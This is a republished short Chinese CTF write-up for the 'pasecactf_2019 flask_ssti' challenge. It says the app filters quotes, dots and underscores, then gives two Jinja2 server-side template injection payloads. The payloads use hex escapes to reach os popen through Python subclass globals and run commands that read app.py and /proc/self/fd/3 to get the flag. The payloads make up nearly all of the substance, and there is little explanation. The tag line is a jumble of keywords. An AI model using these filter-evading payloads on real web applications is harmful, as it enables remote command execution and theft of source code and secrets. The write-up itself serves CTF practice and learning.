web | [pasecactf_2019]flask_ssti
2021-01-05 17:29
阅读:778
标签:pen init 划线 self 应该 成功 pop web sub 明显的ssti 过滤单引号,点,下划线 直接丢exp了 读源码 读flag 我感觉上面的应该就可以了,不过就是读不出来东西,可能有点细微的差别,用另外一个get_data就可以成功了。 web | [pasecactf_2019]flask_ssti 标签:pen init 划线 self 应该 成功 pop web sub 原文地址:https://www.cnblogs.com/Mz1-rc/p/14220880.html{{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[127]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["popen"]("cat%20app\x2epy")["read"]()}}
{{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[127]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["popen"]("cat%20/proc/self/fd/3")["read"]()}}
文章来自:搜素材网的编程语言模块,转载请注明文章出处。
文章标题:web | [pasecactf_2019]flask_ssti
文章链接:http://soscw.com/index.php/essay/40318.html
文章标题:web | [pasecactf_2019]flask_ssti
文章链接:http://soscw.com/index.php/essay/40318.html
评论
亲,登录后才可以留言!